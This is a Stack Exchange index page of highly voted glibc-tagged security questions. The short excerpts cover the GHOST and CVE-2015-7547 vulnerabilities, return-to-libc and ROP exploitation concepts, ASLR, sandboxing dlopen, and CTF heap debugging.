Highest Voted 'glibc' Questions - IT Security Stack Exchange

61

votes

4 answers

GHOST bug: is there a simple way to test if my system is secure?

GHOST (CVE-2015-0235) just popped up. How can I quickly check if a system of mine is secure? Ideally with a one line shell command. According to the ZDNet article "you should then reboot the system". Ideally the test would also indicate this...

ghost glibc

asked Jan 27 '15 at 22:03

the

1,841
2
16
33

10

votes

1 answer

Is Java vulnerable to glibc GHOST Vulnerability in Linux?

I see on our RedHat Linux platform that "java" process has dependency over glibc library: [root@hpproliant1 ~]# ldd /usr/bin/java linux-gate.so.1 => (0xffffe000) libpthread.so.0 => /lib/libpthread.so.0 (0xf7f77000) libjli.so =>…

linux java vulnerability ghost glibc

asked Jan 30 '15 at 18:55

Mert Z.

201
2
4

10

votes

1 answer

GHOST: which services are vulnerable, ssh, web server?

GHOST (CVE-2015-0235) just popped up. GHOST bug: is there a simple way to test if my system is secure? deals with how to find out if your system is vulnerable. exim is mentioned specifically. Apparently OpenSSH is vulnerable but attacks can easily…

ports ghost glibc

asked Jan 28 '15 at 00:13

the

1,841
2
16
33

10

votes

2 answers

Why must a ret2libc attack follow the order "system(),exit(),command?

In a ret2libc attack, I understand that the return address can be overwritten with the address of the system command, which takes a command string as an argument. In this case, shouldn't the address of the command string come directly after the…

exploit buffer-overflow exploit-development glibc stack-overflow

asked Sep 12 '16 at 21:31

Lew Wei Hao

429
5
13

9

votes

1 answer

Jump Oriented Programming segmentation fault issue

I found this interesting post on jop, and since I was not familiar with the concept I decided to play with it. I managed to call arbitrary functions defined in my binary with or without arguments, but never managed to run the example given on the…

exploit buffer-overflow glibc

asked Jan 14 '18 at 23:07

dearn44

193
5

9

votes

1 answer

In light of the glibc DNS vulnerability, why aren't Linux distros updating install images?

Doesn't that make the mere act of updating a newly installed Linux instance unsafe, since the initially installed package manager is vulnerable? Am I missing something? For example, the current Ubuntu 15.10 image dates 21 Oct…

dns vulnerability glibc

asked Feb 25 '16 at 07:45

lamefun

193
5

7

votes

2 answers

Is ASLR useless in preventing attacks such as return-to-libc in linux?

If i'm correct, due ASLR we load libc into some random address. And then in order to make that happen without allowing write permissions of text pages within memory we use plt/got. Now I can simply jump back into some libc@plt function that is…

linux aslr glibc

asked Jan 21 '17 at 13:58

DrPrItay

179
1
5

6

votes

1 answer

How to restrict dlopen() from or to certain paths?

If I want to disable execution of programs on a filesystem, I can use the noexec mount option. However, this doesn’t works with dynamic libraries loaded throughdlopen(). So what is the way to do it with nacl or seccomp ? (this is for untrusted…

linux sandbox glibc code-execution nacl

asked Aug 14 '16 at 17:13

user2284570

1,402
1
14
33

5

votes

1 answer

How to bypass ASLR with ROP

I was reading this article by the InfoSec institute: http://resources.infosecinstitute.com/an-introduction-to-returned-oriented-programming-linux/#gref And was able to follow along until he did the ROP Chain. He finds the offset of printf and execve…

exploit exploit-development assembly glibc

asked Jul 30 '17 at 20:47

alloy

51
1
3

5

votes

1 answer

strategy for dealing with glibc issues through all docker containers

CVE-2015-7547 affects glibc, which is present in pretty nearly all docker containers. There's an automated process underway which will update all official containers, but it's not immediately clear how I should manage the situation. Some third…

docker glibc

asked Feb 20 '16 at 13:13

mc0e

491
2
14

4

votes

1 answer

Return-to-libc Attack mystery

I'm studying the Return-to-libc Attack and I understand the concept. But one thing still does not make sense. In order to make the attack I need the memory address of system() and "/bin/sh", which is different on every system. And all the examples I…

penetration-test exploit buffer-overflow glibc

asked Jan 06 '18 at 20:12

Spring

253
1
6

4

votes

2 answers

return to libc- finding libc's address and finding offsets

So I tried performing a return-to-libc according to https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ . I found libc's address by using "ldd vuln", and found system's offset by using "readelf -s…

exploit buffer-overflow exploit-development debugging glibc

asked Aug 24 '17 at 07:33

Jonathan

53
1
2
7

3

votes

2 answers

How to confirm that my router is vulnerable to the glibc vulnerability (CVE-2015-7547)?

I have tried PoC from Google (https://github.com/fjserna/CVE-2015-7547) to test my host PC (first execute the server side PoC then execute client side PoC). It was vulnerable. Now I want to check my router, but I'm not sure how to test it. Iif I…

dns router glibc

asked Mar 02 '16 at 16:00

Lee Youngho

31
1

3

votes

1 answer

return-to-libc attack

I was trying to attempt at return-to-libc buffer overflow attack for my Computer Software Security assignment. As far as my understanding goes, we can do these kind of attacks regardless of stack protection measures such as canaries and…

exploit buffer-overflow glibc

asked Feb 09 '16 at 04:36

yellowflash

35
1
6

2

votes

1 answer

CTF setup for debugging heap exploits

I'm currently studying binary heap exploitation (mainly the glibc (ptmalloc2) implementation), for CTF competitions. The problem I'm facing is debugging challenges designed for a certain glibc version. I know there are some differences between (for…

debugging ctf glibc

asked Sep 22 '20 at 08:01

Z. Alessandro

23
3

Questions tagged [glibc]